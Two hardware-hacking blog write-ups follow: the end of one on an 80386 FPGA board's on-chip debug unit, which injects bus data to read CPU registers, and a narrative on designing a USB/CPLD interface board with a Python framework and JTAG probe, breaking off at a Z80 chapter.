This unit is basically a processor specially designed to handle 386 signals. It fetches its instructions from the 256 x 16-bit Avalon memory filled by the supervisor and operates on a 16 x 16-bit data space also located on shared memory.

While supervisor can access OCD program and data unrestrictedly, the OCD Unit can only operates on its data space which corresponds to offset 0x100 from supervisor point of view. In the dedicated assembler, data memory is addressed using R1 to R15 naming convention.

  1 2 3 4 5 6 7 8 9 10 11 12 13 module ocd ( // OCD Control input rst, // Connected to OCD_CTL input clk, // 40MHz clock (synchronous with 20MHz CPU clock) output reg en, // Asserted if OCD Unit is attached to the 386 output reg stop, // Connected to OCD_STATUS // 80386 signals ... // RAM signals (Avalon) ... ); 

Implementing this kind of processor is quite simple and a basic one will be based on the following state machine :

As Avalon memory signals are always latched, reading on it takes two clock cycles : the first cycle is used to latch the address value and the second one latches the result on the data bus. Taking that into account, execution of a single instruction which reads and writes on data memory cannot take less than five clock cycles.

• FETCH : Get instruction from program memory.
• EXEC : Load source value from data memory and execute the instruction.
• STORE : Store result and compute next address of the next instruction.
• LATCH : Latch instruction address into program memory.

Instruction set is composed of several categories. The first one is used to control the OCD :

• ATTACH/DETACH : Connect/Disconnect the OCD unit to 386 signals.

The second category includes instructions related to 386 signals processing :

• LDD d : Load data bus value into d register.
• LDAL d / LDAH d : Load address bus value into d register.
• LDWR d : Load W/R# signal into d register.
• LDDC d : Load D/C# signal into d register.
• LDMIO d : Load M/IO# signal into d register.
• STD s : Set data bus value to s register value.
• START/RESET : Start/Reset the CPU.
• READY : Assert READY# signal.

Of course, some instructions only operate on registers :

• LDI d, imm16 : Load a 16-bit immediate into d register.
• MOV d, s : Move s register value into d register.
• CLR d : Clear d register.

Third category is about flow control. As the data memory only exposes one port to the OCD Unit, implementing a compare instruction which loads two registers is not possible in a single cycle. So a compare register as been added to the core. All comparisons will be related to that register.

• LDCMP s : Load s register value into the compare register.
• CMP s : Compare s register value with compare register value and store the result into the compare register.
• BA/BEQ/BNE addr : Branch to the specified address according to compare register value.

As example, those instructions performs a jump to label if R1 is equal to R2 :

 1 2 3  LDCMP R1 ;; cmpr <- R1 CMP R2 ;; cmpr <- cmpr == R2 BEQ label ;; pc <- label if cmpr != 0 

Some instructions can stay more than one cycle in the EXEC state order to wait for an acknowledge from the CPU during some bus operation :

• HOLD : Assert HOLD signal and wait for HOLDA signal.
• INT : Assert INT signal and wait for INTA signal.
• EXIT : Stop OCD routine execution. Never leaves EXEC state and assert ocd.stop signal.

This wait state mechanism is also used to implement instructions used to wait for a particular event on the bus. All those instructions deassert READY# signal and attach the OCD to the 386 when the expected condition is triggered.

• WAITADS : Wait for ADS# signal to be asserted
• WAITIO : Wait for ADS# and M/IO# getting low
• WAITLOCK : Wait for ADS# and LOCK# to be asserted

The block diagram of this unit can be represented as :

Here is routines used to reset and start the CPU from OCD Unit. Notice that the start routine let the original bus controller operates on the 386 until an IO access is performed. The supervisor has just to be interrupted when the OCD is exited from the start routine to handle the IO request. Devices can then be emulated by the supervisor or by the host.

  1 2 3 4 5 6 7 8 9 10 11 .func ocd_prgm_reset RESET ;; RESET <- 1 EXIT .func ocd_prgm_start START ;; RESET <- 0 DETACH ;; Let bus controller to handle CPU signals WAITIO ;; Wait for IO access to attach OCD Unit LDAL R1 ;; Get IO port address LDWR R2 ;; Get IO operation type EXIT 

### Example : Obtaining CPU registers

Now that the OCD Unit internals have been presented, the purpose now is to use it to get CPU registers.

Before applying debug operations on the CPU, it is necessary to stop execution and set it up in a known state. The simplest method to interrupt a 386 without having to mind about the interrupt flag is to send a Non Maskable Interrupt. Unlike INTR signal, NMI mechanism does not provide any acknowledge from the CPU. So the way only to know if the CPU actually took into account the NMI is to wait LOCK# signal assertion. Indeed, the 386 locks the whole bus when it accesses an IDT or IVT entry. The WAITLOCK instruction has been designed for that specific purpose.

 1 2 3  .func ocd_prgm_break NMI ;; Set NMI signal WAITLOCK ;; Wait for ADS# and LOCK# signals then attach OCD unit 

On the next step, the behaviour of the CPU is different according to its mode. If the 386 is still in real mode, it will fetch the code segment and the offset of the NMI handler located on the Interrupt Vector Table. As IVT always starts at 0x0000000, the address 0x0000008 will be outputted after triggering the NMI.

In the other hand, if protected mode is enabled, the CPU will fetch an Interrupt Descriptor corresponding of the NMI interrupt. This structure is located on the Interrupt Descriptor Table which can be found anywhere on the address space.

As the processor mode is unknown at that moment, it can be deduced from the first requested address after NMI :

  1 2 3 4 5 6 7 8 9 10 11 12 ;; Get CPU Mode LDAL R2 ;; Load requested address LDAH R3 LDCMP R2 LDI R1, 0x0008 CMP R1 BNE break_protected_mode ;; Branch to protected mode handler if ;; A[15:0] != 0x0008 LDCMP R3 BEQ break_real_mode ;; Branch to real mode handler if ;; A[23:16] is equal to the NMI entry ;; offset on the IVT 

Only protected mode will be considered for the rest of the example.

As IDT set by the application cannot be trusted, using the OCD Unit to drive a valid interrupt gate is conceivable :

  1 2 3 4 5 6 7 8 9 10 11 12 13 ;; Fake IDT entry LDI R1, 0b1000111000000000 ;; Flags STD R1 WAITADS LDI R1, 0x000D ;; Offset[31:16] STD R1 WAITADS LDI R1, 0x0000 ;; Offset[15:0] STD R1 WAITADS LDI R1, 0x0008 ;; Segment Selector STD R1 WAITADS 

A code segment reload is always performed before jumping to the interrupt handler. So a read to a GDT entry will be requested by the CPU.

In the same way, it is painless with this mechanism to drive a valid code segment :

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ;; Fake GDT entry LDI R1, 0b1001101000000000 ;; Flags | Base[23:16] STD R1 WAITADS LDI R1, 0x00CF ;; Base[31:24] | G | D/B | Limit[19:16] STD R1 WAITADS LDI R1, 0xFFFF ;; Limit[15:00] STD R1 WAITADS LDI R1, 0x0000 ;; Base[15:0] STD R1 WAITADS READY ;; GDT Access bit WAITADS 

Finally, as EFLAGS, EIP and CS registers have been modified, they are pushed on the stack. However the bus controller is disconnected from CPU signals : this means that no actual write on the memory are performed during this operation. Instead, it is straightforward to load those values into OCD registers :

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ;; Context saving LDD R2 ;; EFLAGS[15:0] READY WAITADS LDD R3 ;; EFLAGS[31:16] READY WAITADS LDD R4 ;; CS READY WAITADS LDD R5 ;; EIP[15:0] READY WAITADS LDD R6 ;; EIP[31:16] READY 

Afterwards, the CPU will try to fetch instructions from the interrupt handler. So HOLD signal is asserted at the end of the break routine. This leaves the supervisor time to load the next routine to the OCD program memory.

At this point, 386 is on a known and valid state which allows us to inject any instructions sequences. In order to obtain CPU registers, the pusha instruction can be injected :

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28  .func ocd_prgm_get_regs LDI R1, 0x9060 LDI R2, 0x9090 WAITADS ;; Fill instruction prefetch queue STD R1 ;; Drive PUSHA; NOP WAITADS STD R2 ;; Drive NOP; NOP WAITADS STD R2 ;; Drive NOP; NOP WAITADS STD R2 ;; Drive NOP; NOP WAITADS STD R2 ;; Drive NOP; NOP WAITADS ;; PUSHA LDD R0 READY WAITADS ... LDD R15 READY HOLD ;; Hold CPU in order to avoid instruction fetch during ;; loading of the next OCD routine EXIT 

However, pusha instruction modifies ESP value. In the same way, a mov instruction can be used to restore ESP and set any register value.

When debugging phase is over, a continue routine is executed which basically inject an iret and drive original values of EIP, CS and EFLAGS.

For now, the debug unit is provided with a CLI interface allowing simple CPU interactions. When more debug features will be available, the goal is to embed a gdb stub into the host application.

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 [lsepc-monitor] start [lsepc-monitor] status CPU Status: RUN [lsepc-monitor] break [lsepc-monitor] status CPU Status: Break (Protected Mode) [lsepc-monitor] getregs EFLAGS: 00000046 EIP: 000fd024 ESP: ffe4000c EBP: 00000123 EAX: 1100bbaa EBX: 5544000f ECX: 9988ffee EDX: ddcc7766 ESI: 456789ab EDI: cdef9090 CS: 0008 [lsepc-monitor] continue [lsepc-monitor] status CPU Status: RUN 

## Conclusion

Developing and testing on the LSE-PC is still mainly based on the JTAG interface. When connected to a JTAG interface, the FPGA design exposes the following entry points :

• RAM/ROM editor : used to perform on-chip operation on the internal memory
• NIOS II interface : used to program and debug the NIOS II contained on the supervisor
• Serial Flash Loader : used to program the SPI flash which contains FPGA configuration
• SignalTap : used to perform signal analysis.

This board is still a proof a concept. However, its composition was an excellent exercise to understand how the original 80386 CPU works under the hood.

Although some work need to be done to get a profitable on-chip debugger, the hardware part and the simple chipset embedded are reliable enough to allow execution of simple applications.

• # One Device to drive them all

Written by Pierre Surply
2016-10-24 15:50:00

## Prologue

Three Devices for logic analysis of passively captured traces,
Seven for inter-chip communication driven by hardwired interfaces,
Nine for in-circuit debugging limited to specific purpose,
One for complex hardware hacking scenarios.

Three tinkerers took those words as they are. Overthrown by the complexity implied by the multiplicity of inefficient tools, they thought that time had come to undertake this problem from another angle.

All they needed was a simple way to manipulate the exotic devices that they required for their projects. Manufactured by foreign organizations, devices referred here were designed to fulfill a predefined purpose and were intended to be used as black boxes. Without any knowledge of the internal mechanisms involved in their operations, it was conceivable to integrate them if they were in the kind of environment that they were promised to.

But those tinkerers though differently. Their situation was mostly complicated by the fact that they had already acquired a good control of their personal computers that they considered as their main and perfect workstation. Well defined and roughly understood, they were too stubborn to learn another way to work as they unanimously decided that this method was the most effective and compliant with the rest of their work.

So instead of reworking there methodology, they agreed that defining a third device whose only purpose was to handle the interfacing between the workstation and the device under test were inescapable. The first member of the group asked to others what options were available to fit this position.

The second one said that he already made an intensive usage of the Arduino for that. Providing an easy access and control of its GPIO and some hardwired bus controllers, it was suitable for the most simple cases.

The third one discussed the merits of the Bus Pirate from Dangerous Prototype. Mature and widely-used, this tool provided a direct control of its interface via USB without the need to develop a specific firmware to be actually used.

The first one replied to these proposals that they had a common issue: they simply performed the communication with the host by using an interface based on the translation of USB to UART speeded at 115200 bauds. For him, it prohibited a fine-grained configuration and then limited the full capacities provided by the USB protocol.

They all agreed on this last point and started to work on a first prototype of their response to this situation.

It was based on a STM32F072 microcontroller and mapped SPI, I2C, UART and CAN signals to physical headers. As this chip was able to drive USB signals, a USB mini-connector was directly connected to it.

Concerning the software side, one interesting idea here was to expose the hardware interfaces using the corresponding subsystem in the Linux kernel. Even though these subsystems were mostly used to describe on-chip interfaces, adapting them to wrap up the USB functions was feasible. For instance, the SPI exposed by the device could be manipulated as a regular spidev.

Although the concept of such board was appealing at the time, limitations quickly appeared. First of all, most of the USB protocol had to be implemented via software on the STM32F072 which led to a significant overhead on each USB transaction. Secondly, fully implementing the host driver in kernel space implied a rigid configuration and error-prone if not implemented correctly. Finally, the global stability of the STM32F072 MCU was quite poor especially during a development phase where on-chip debugging had to be frequently used.

One year passed and no one was actually enthusiastic to use this dead-born project in a real context. The first one, whose credibility was at its lower point, got the bravery to propose to the two others to rethink the project from the beginning. And they accepted, against all odds.

This write-up must be considered as the collection of thoughts that led them to the design and the manufacture of a second version of this small, unpretentious, and unfinished electronic board.

## Chapter I: Forging the One Device

The first step for them was to clearly define how and what could make the second version of the board better than the previous one. The main issue was related to the lack of flexibility of the design and they wondered how they could handle a protocol not supported by the microcontroller they used.

Then they decided to take a look at the wide range of Programmable Logic Devices available nowadays. As a first prototype, a CPLD appeared to be the best choice for such application. Compared to a regular FPGA, these non-volatile PLD were cheaper and required a much more simpler configuration circuit. They also thought that the prototype was designed to only prove a concept and moving to a more powerful FPGA for next versions was conceivable.

### Section I: From Ink...

From a high-level point of view, the board had been specified to expose a reasonable number of IOs directly connected to a controller, here an Altera Max V CPLD. As the flaky soft USB implementation of the previous version was quite inconvenient to maintain and to keep reliable, the job here had been assigned to a well-known and solid dedicated USB controller: the FX2LP from Cypress Semiconductor. This highly integrated USB 2.0 microcontroller implemented most of the protocol logic in silicon and only burdened its integrated 8051's firmware with the high-level configuration aspect of USB.

And then came the question about the communication between the USB controller and the IO controller. The FX2LP embedded a powerful mechanism to forward the content of a USB entrypoint to an hardware FIFO without any interaction with the internal 8051. These EP buffer's words could then be dequeued by an external component using an hardware interface.

However, this one was defined by a 16-bit data bus and 6 control signals which was quite pin-consuming for the CPLD they chose. Fortunately, another mechanisms offered by the FX2LP allowed the programming of a custom protocol to transmit and receive these data with the external world: the General Programmable Interface. As for the regular FIFO interface, this hardware unit was almost completely independent from the 8051. The firmware was only responsible to program the hardware state-machines used to represent the waveforms of a one-word transmission.

In their case, they chose to allocate 8 wires for the bidirectional data bus, 3 control signals driven by the USB controller and 2 'ready' signals initiated by the IO controller. At that point, none of them had actually thought about the exact shape of the waveforms and the purpose of the control signals but planned to consider that once the first board would be fully manufactured.

The USB device interface was composed of 3 endpoints. The endpoint 0 acted as a regular control endpoint and was used to transfer small requests. Meanwhile, endpoints 2 and 6 were dedicated to bulk transmissions and receptions respectively. The two last were directly connected to the internal FIFO while the first one was completely handled by the 8051.

To power these components, the 5V supplied by the USB were firstly shifted to 3.3V using a low-dropout voltage regulator to power the USB controller and the IO banks of the CPLD while a 1.8V regulator powered the CPLD's internal logic.

The main clock was managed by the FX2LP. Connected to a 24MHz crystal, the internal PLL were configured by the 8051 firmware allowing a CPU clock frequency of 48MHz, 24MHz or 12MHz. As the output of the phase-locked loop was also exposed outside the USB controller by the CLKOUT pin, the CPLD used it as a system clock.

The GPIF unit had a dedicated clock that could be fed internally or imposed by an external device. All operations on this interface were aligned to this signal. In order to avoid to deal with multiple clock domains in the CPLD, they arranged to drive the IFCLK signal from the IO controller at the half frequency of the system clock.

An I2C EEPROM had been connected to USB controller in order to store its firmware in a persistent way. The internal reset logic of the FX2LP was designed to scan the I2C bus for EEPROM from where a valid firmware could be loaded. Once the program was fully copied to internal RAM, no operations were performed on this bus.

After several tries, they finally validated the following schematic:

### Section II: ...To Copper

Once the design approved, the next step consisted to draw the printed circuit board. Two layers were enough to route the entire netlist in a surface of 5x5cm.

The top layer was dedicated to voltage regulation, CPLD, connectors and a couple of switches and LEDs. Meanwhile, the bottom one contained the whole circuit required to make the USB controller working: crystal, EEPROM, I2C pull-up resistors, ...

IOs from the CPLD were exposed via 2 dual-row 20-pin female headers of 2.54mm pitch.

As the board was manually soldered, it was not conceivable for them to use BGA components for this prototype. So the 100-pin LQFP version of the CPLD had been used as well as the 56-pin SSOP package of the Cypress's chip.

After hours of painful electrical tests, a first sample of a fully soldered board was born by the end of the Spring:

## Chapter II: On Reprogrammability They Hoped

Although the physical board was ready, a firmware was still needed to make it working. The situation was more complex than just a simple binary located in a single ROM as most of the boards of this category are.

First of all, the firmware for the FX2LP had been implemented which basically consisted to configure the USB and the GPIF units of the chip. Nothing uncommon here: writing applications for this kind of microcontroller was quite easy as it was well-documented and that tons of similar usages of this chip already existed and were publicly available. The code has been written in a couple of hours and no new features have been added since as they decided to make the firmware serving only one unique purpose: translate USB data to IO controller in the most simple and lightweight way.

For them, most of the customizations that would be needed should be fully-implemented at the IO controller level. The real challenge here was to take advantage of the CPLD as a powerful and programmable IO controller.

One solution would be to base the CPLD's design on a soft-processor: modifying IO's behaviour would mean loading a new firmware into its RAM. Although this architecture was quite common when using an FPGA, it became more inconvenient when basing it on a CPLD due to the lack of memory blocks.

The second solution would be to generate and configure the design of the CPLD according to the user's needs dynamically. As pursuing this concept using a regular hardware description language seemed almost impossible for them, they decided to fully base the design generation on Migen. This python module allowed the meta-programming of synchronous register transfer level design and handled the generation of a verilog file that could then be synthesised by the regular Altera's toolchain.

### Section I: Modularity And Modulation

They fully defined the architecture around the concept of modularity. To demonstrate how it would transpire in a real context, they took the example of a Pulse-Width Modulation interface.

The main principal of such technique was to use a rectangular pulse wave whose pulse width was modulated resulting in the variation of the average value of the waveform.

A possible implementation of a PWM module could be achieved by using a counter whose width defined the period of the signal and a digital comparator to generate the needed duty cycle.

In this case, the only signal that was likely exposed externally would be the output of the comparator, negated or not. Moreover, a 'parameter' of this circuit would be the left-input of the comparator and was typically the kind of signal that would be interesting to implement as a register writable from the host.

For their example, they also considered that the counter value could be watched from the host.

The 'parameter' signals were called 'Control Registers' and were intended to be readable and/or writable from the host while the signals that would be eligible to be mapped to a physical pin of the CPLD were called 'IO Signals'.

In a more generic way, this kind of module, that they called 'IO Module', could always be represented according to the following template:

• An internal logic block that could contain both combinational and sequential logic left to IO Module's discretion.

• 'Control Registers' connected to an internal bus and used to watch and control the activity of the internal logic from the host.

• 'IO Signals' intended to interact with an external component and to be mapped to real pin.

Imposing such kind of interface also meant imposing a huge, redundant and overblown part of HDL code only to ensure the glue logic between the core logic of the module and the rest of the design. This was where meta-programming became appropriated.

A python module called bmii had been developed to extend the structures provided by Migen. For instance, an extension of the 'Module' objects was included in this library to add all facilities needed to generate the intended glue logic.

 1 2 3 from bmii import * iom = IOModule("pwm") 

This object contained the cregs special attribute which was used to manage the control registers of the IOModule. CtrlReg was charged to construct a special 8-bit width Migen's Signal which embedded extra information needed to build the control registers network. The direction of such register had to be manually specified during instantiation. It could be:

• RDONLY: Only readable from the host. The signal had to be driven by the internal logic of the IOModule.
• WRONLY: The signal could only be latched from the host but could not read it back. This direction was useful to suggest the toolchain to synthesise this signal as a wire instead of a verilog's reg.
• RDWR: The signal could be read and written from the host. Synthesis of this kind of signal would likely result to verilog's reg.

For the PWM IOModule, only the pulse's WIDTH and the COUNTER signals had to be accessed from the host.

 1 2 iom.cregs += CtrlReg("WIDTH", CtrlRegDir.RDWR) iom.cregs += CtrlReg("COUNTER", CtrlRegDir.RDONLY) 

In the same way, iosignals attribute handled the signals intended to be mapped to physical pins. An IOSignal always correspond to a 1-bit width signal. The direction of an IOSignal was also needed to be explicitly specified.

• OUT: Signal driven by the IOModule.
• IN: Signal driven by an external component and read by the IOModule's logic.
• DIRCTL: Signal driven by the IOModule and used to control the tri-state buffer of a pin.

The PWM only used two outputs:

 1 2 iom.iosignals += IOSignal("OUT", IOSignalDir.OUT) iom.iosignals += IOSignal("NOUT", IOSignalDir.OUT) 

Finally, the internal logic could be described by using Migen's special attributes:

 1 2 3 iom.sync += iom.cregs.COUNTER.eq(iom.cregs.COUNTER + 1) iom.comb += iom.iosignals.OUT.eq(iom.cregs.COUNTER < iom.cregs.WIDTH) iom.comb += iom.iosignals.NOUT.eq(~iom.iosignals.OUT) 

### Section II: An Iron Hand In A Velvet Glove

The concept of control register was illustrated and justified. Their aim was then to think about how to make them accessible from the host by using USB.

Concretely, this step meant defining a unit that would be able to translate GPIF waveforms to a more convenient protocol to drive the internal bus. This unit had been called 'Northbridge'.

The internal bus had been defined as follow:

• MOSI[0:7] and MISO[0:7] represented the both directions of the data bus.
• WR distinguished a read or a write operation.
• MADDR[0:2] and RADDR[0:4] were used to generate the chip select signal for a module and a control register respectively.
• REQ informed the control register that an operation was going to be performed.

The issue here was related to the fact that the GPIF data bus had exactly the same width that a control register. This meant that the addressing and the read/write operations on the internal bus could not be achieved in a single clock tick.

From the GPIF point of view, performing an operation on the internal bus meant sending the module/control register address (latched by the Northbridge) before proceeding to the actual read/write operation.

The northbridge managed the GPIF's control signals as follow:

• CTL0 and CTL1 were basically forwarded to the REQ and WR signals of internal bus respectively.
• CTL2 was used to indicate that the USB controller was latching an address and that the current operation must not be considered as a regular write operation.

The northbridge was polling for operation by checking the value of the CTL0 signal when clocking the interface clock.

In addition of containing a value, control registers were generated with extra signals used to represent the operation currently performed on it and then facilitated their usage from the internal logic.

The wr and rd signals indicated that the control register was selected and that a write or read operation respectively was going to be performed. These signals were asserted during several clock ticks as they were directly forwarded by the northbridge from the GPIF. So to facilitate the use of them in a synchronous circuit, wr_pulse and rd_pulse were derived from the previous signals. By using a 'level to pulse' state machine, wr_pulse were implemented to be asserted during exactly one clock tick when the write operation was completed and then indicated to the internal logic that a valid value was available in the register. In a meantime, rd_pulse pulsed the beginning of the read operation to inform the IOModule that the control register was going to be read and then gave it time to feed a correct value before the next falling edge of rd signal, moment when its value was actually captured by the northbridge.

At that point, any control register could be accessed from the host using the correct USB request. In order to make the usage of the USB easier from the host point of view, an additional interface had been introduced: the BMIIModule.

A python object of this type contained two special attributes: the first one was the IOModule which represented the RTL design while the second was called the driver of the BMIIModule. Automatically created, the drv attribute was able to inspect the IOModule to generate the correct USB request according to the information specified in the RTL about the control registers addresses and directions.

 1 pwm = BMIIModule(iom) 

To finalize the generation of the IO controller design, the BMII object acted as a top-level representation of the whole design of the board. It must be informed that a new module had to be added by using its add_module method.

A call to this procedure meant connecting the IOModule to the internal bus, allocating module and control registers addresses.

 1 2 b = BMII() b.add_module(pwm) 

Once the CPLD configured, the host could easily accessed the control registers by simply setting the attributes of the drv aliased with the control registers names:

 1 2 pwm.drv.WIDTH = 42 cnt = int(pwm.drv.COUNTER) 

### Section III: The Signal Goes South

In the same way the northbridge managed the communication with the external USB controller, a other dedicated unit had been defined to handle the multiplexing of the IOSignals to physical IO pins. Obviously called the southbridge, it was implemented as a special IOModule which had no IOSignals and was only charged to manage the signals coming from other modules. For each physical pin, the southbridge was charged to generate the following circuit:

Each pin was considered bidirectional and the direction could be configured with an IOSignal defined as such. An unlimited number of signals could read the value of a pin while only one could drive it.

To inform the southbridge that an IOSignal had to be connected to a pin, assignment to pins attribute of this unit had to be performed as follow:

 1 b.ioctl.sb.pins.LED0 += pwm.iomodule.iosignals.OUT 

The direction declared during the definition of the IOSignal were used to determine where the signal had to be connected on the pin multiplexing circuit.

As the southbridge was considered as a regular IOModule, it was connected to the internal bus and then exposed its own control registers. This opportunity was leveraged to make the pins controllable from host bypassing the need of defining a specific IOModule when a simple operation had to be performed on the IOs.

PINDIR, PINDIRMUX, PINOUT, PINMUX and PINSCAN signals of each pin were accessible using southbridge's control registers. For instance, making the LED blinked could be commanded by:

 1 2 3 b.modules.southbridge.drv.PINMUXMISC.LED1 = 1 # Make the southbridge drive the LED0 pin b.modules.southbridge.drv.PINOUTMISC.LED1 = \ int(b.modules.southbridge.drv.PINSCANMISC.LED1) ^ 1 # Toggle the LED0 pin 

For the example design previously defined, a complete mapping of the internal bus's address space looked as follow:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 b.list_modules() -- 0x0: northbridge 0x0: IDCODE (CtrlRegDir.RDONLY) 0x1: SCRATCH (CtrlRegDir.RDWR) 0x1: southbridge 0x0: PINDIR1L (CtrlRegDir.RDWR) 0x1: PINDIR1H (CtrlRegDir.RDWR) 0x2: PINDIR2L (CtrlRegDir.RDWR) 0x3: PINDIR2H (CtrlRegDir.RDWR) 0x4: PINSCAN1L (CtrlRegDir.RDONLY) 0x5: PINSCAN1H (CtrlRegDir.RDONLY) 0x6: PINSCAN2L (CtrlRegDir.RDONLY) 0x7: PINSCAN2H (CtrlRegDir.RDONLY) 0x8: PINSCANMISC (CtrlRegDir.RDONLY) 0x9: PINMUX1L (CtrlRegDir.RDWR) 0xa: PINMUX1H (CtrlRegDir.RDWR) 0xb: PINMUX2L (CtrlRegDir.RDWR) 0xc: PINMUX2H (CtrlRegDir.RDWR) 0xd: PINDIRMUX1L (CtrlRegDir.RDWR) 0xe: PINDIRMUX1H (CtrlRegDir.RDWR) 0xf: PINDIRMUX2L (CtrlRegDir.RDWR) 0x10: PINDIRMUX2H (CtrlRegDir.RDWR) 0x11: PINMUXMISC (CtrlRegDir.RDWR) 0x12: PINOUT1L (CtrlRegDir.RDWR) 0x13: PINOUT1H (CtrlRegDir.RDWR) 0x14: PINOUT2L (CtrlRegDir.RDWR) 0x15: PINOUT2H (CtrlRegDir.RDWR) 0x16: PINOUTMISC (CtrlRegDir.RDWR) 0x2: PWM 0x0: WIDTH (CtrlRegDir.RDWR) 0x1: COUNTER (CtrlRegDir.RDONLY) 

The northbridge used two control registers defined for testing purposes only. The IDCODE contained a magic number read by the USB controller to verify the validity of the CPLD's configuration while the SCRATCH register was used to test write operations on the bus.

To sum up, the following architecture had been defined as the basis for further improvements:

### Section IV: An Autarchical Sequence

As this architecture was mainly based on the flexibility provided by the CPLD, one issue still remained before becoming truly usable: the compiling and programming sequences of a BMII's design had to stay self-contained and to avoid the need of external hardware tools.

The building sequence aimed to produce the binary blob of the USB firmware as well as the bitstream of the IO controller. For the FX2LP, a ninja build file was generated to proceed to the compiling of the custom firmware using sdcc.

Concerning the IO controller, the verilog generation was left to Migen while the building of the bitstream was ensured by Quartus.

 1 b.build_all() 

The programming sequence was a bit more tricky. A first and trivial way to achieve this was to use a USB Blaster JTAG probe to configure the CPLD with the desired bitstream. In order to be self-programmed, the CPLD's JTAG signals had been connected to a tri-state buffer in addition to the regular 10-pin JTAG header. Ensured by a standard 74244, this buffer was driven by the USB controller. The goal of this circuit was to give the ability to communicate with the CPLD via JTAG when the JTAGE was asserted.

To be able to reuse Quartus Programmer software to program the CPLD, the open-source implementation of the USB Blaster protocol for FX2LP (ixo.de USB JTAG) had been adapted to match the wiring of their circuit.

 1 b.program_all() 

The programming sequence could be summarize as follow:

• The first step was to load the custom USB Blaster firmware into the USB controller using fxload.
• If a JTAG IDCODE scan was successful, the bitstream was uploaded using Quartus Programmer.
• To be able to write their own FX2LP firmware to the EEPROM, a second stage firmware loader was programmed in the chip. It added a new USB vendor command allowing writing operations on the I2C bus.
• Finally, the regular firmware was loaded in the USB controller.

## Chapter III: The Fellowship Of The Joint Test

As a first application of there board, the second tinkerer proposed to implement a full-featured JTAG probe that anyone could use as an alternative to Flyswatter, Bus Blaster or any other cheap JTAG probe.

The JTAG defines an electrical standard for on-chip instrumentation by using a dedicated debug port implementing a serial communication interface. This protocol was well-defined and simple enough to be used as a comprehensive example.

The third one replied that demonstrating the usefulness of their project by trying to mimic other well-known and mature JTAG probes was a waste of time since reaching comparable performance would required more effort that he could imagine at the time.

The first tinkerer mitigated that argument by pointing the fact that no cheap JTAG probe was generic enough to be compatible with a very wide range of platforms and very few of them were designed to be used in contexts other than just CPU's on-chip debugging. He agreed and started to think about a possible implementation of such protocol using their project.

### Section I: The Bridge Of Shockley

Even though the JTAG standard was quite strict about the communication logic, the electrical characteristics of the signals were left to the target device. This meant that the probe had the responsibility to drive them with the target voltage.

Assuming that the main board was only able to drive 3.3V IOs, expanding it with the needed interface was required.

A first version had been implemented using voltage level shifters and worked well with some mainstream devices. However, some platforms from specific manufacturers pull-up JTAG signals with very low resistors, which forced the probe to drive more current than most of the voltage level shifters could supply.

As a quick fix, the expansion board had been equipped with bipolar junction transistors for output signals.

In a more generic way, they though that being forced to design expansion board to electrically convert signals from the main board to the driven target was not a big deal. Main board's IO could simply not be electrically universal.

### Section II: The Self-Surgery

For a naive implementation of JTAG protocol, the IOModule consisted of simply connecting the TMS and TDI outputs to a write-only control register while wiring the TCK to its wr_pulse signal. In this configuration, each JTAG clock tick was triggered by writing to this control register.

Each devices on a JTAG's daisy chain communicated via a Test Access Port. This hardware unit implemented a stateful protocol to expose its debug facilities. As it was possible to make all of them converged to a reset and stable state, it was easy to walk though this state machine by keeping all TAPs synchronized.

Assuming this, a unique state machine was implemented in the IOModule to keep the track of the current TAP state. A control register had been allocated to allow the host to check this state when needed.

Devices responded to JTAG scans with the TDO signal. The FIFO block was used to buffer received data before being read by the host thought a read-only register. This case perfectly demonstrated the usage of the rd_pulse signal since it was used to dequeue the next value of the FIFO submodule.

Although most platforms's JTAG daisy chain were short and fixed, some of them could dynamically append TAP to the chain, making the usage of general purpose JTAG tools unusable. To describe this kind of situation, facilities had been implemented to describe a dynamic TAP network.

 1 from bmii.modules.jtag import JTAG, TAP, DR 

A JTAG object extended a regular BMIIModule to abstract the low-level operations to the JTAG's IOModule.

TAP and DR were provided to describe the current layout of the TAP network. For instance, describing the Max V's JTAG would look like this:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 class AlteraMaxVJTAG(JTAG): def __init__(self): JTAG.__init__(self) tap = TAP("CPLDTAP", 10) # 10-bit instrwuction register # name instr. reg. length tap += DR("SAMPLE/PRELOAD", 0b0000000101, 480) tap += DR("EXTEST", 0b0000001111, 480) tap += DR("BYPASS", 0b1111111111, 1) tap += DR("USERCODE", 0b0000000111, 32) tap += DR("IDCODE", 0b0000000110, 32) tap += DR("HIGHZ", 0b0000001011, 1) tap += DR("CLAMP", 0b0000001010, 32) tap += DR("USER0", 0b0000001100, 32) tap += DR("USER1", 0b0000001110, 32) self.add_tap(tap) @classmethodw def default(cls, bmii): jtag = cls() bmii.add_module(jtag) bmii.ioctl.sb.pins.IO10 += jtag.iomodule.iosignals.TMS bmii.ioctl.sb.pins.IO11 += jtag.iomodule.iosignals.TCK bmii.ioctl.sb.pins.IO12 += jtag.iomodule.iosignals.TRST bmii.ioctl.sb.pins.IO13 += jtag.iomodule.iosignals.TDI bmii.ioctl.sb.pins.IO21 += jtag.iomodule.iosignals.TDO return jtag 

According to that description, scanning the IDCODE of the device could be simply done by:

 1 2 3 4 5 b = BMII() jtag = AlteraMaxVJTAG.default(b) jtag.reset() jtag.irdrscan("CPLDTAP", "IDCODE") 

A possible improvement for this would be to generate this tap network directly from the BSDL files of daisy chained devices. The usage of BJT to drive JTAG signals was also a very quick and easy response to the low pull-up resistance problem. The third tinkerer complained that many other solutions could be implemented there as the BJT had a very long switching time and then forced to drive signals at 12MHz when many targets supported to be clocked up to 100MHz in their debug port.

## Chapter IV: And In Darkness Bind Them

Sceptical about the results of the first application, the third tinkerer thought about a niche application that only few people would actually need. Enthusiastic but upset by the pragmatism of the two other, he left the group to develop his idea by his own.

For him, a second purpose for this board was purely and simply to act as a test bench for analysing black-boxed devices. To demonstrate his idea, he chose the first device he could found on his drawer: a Z80 packaged in a DIP-40.

Primary sold by Zilog as an improved Intel 8080, it had become a very popular processor for simple embedded applications since it was truly easy to make this chip working with a custom circuit. This device was then the perfect guinea pig for his experiences.

### Section I: The Calm Before The Storm

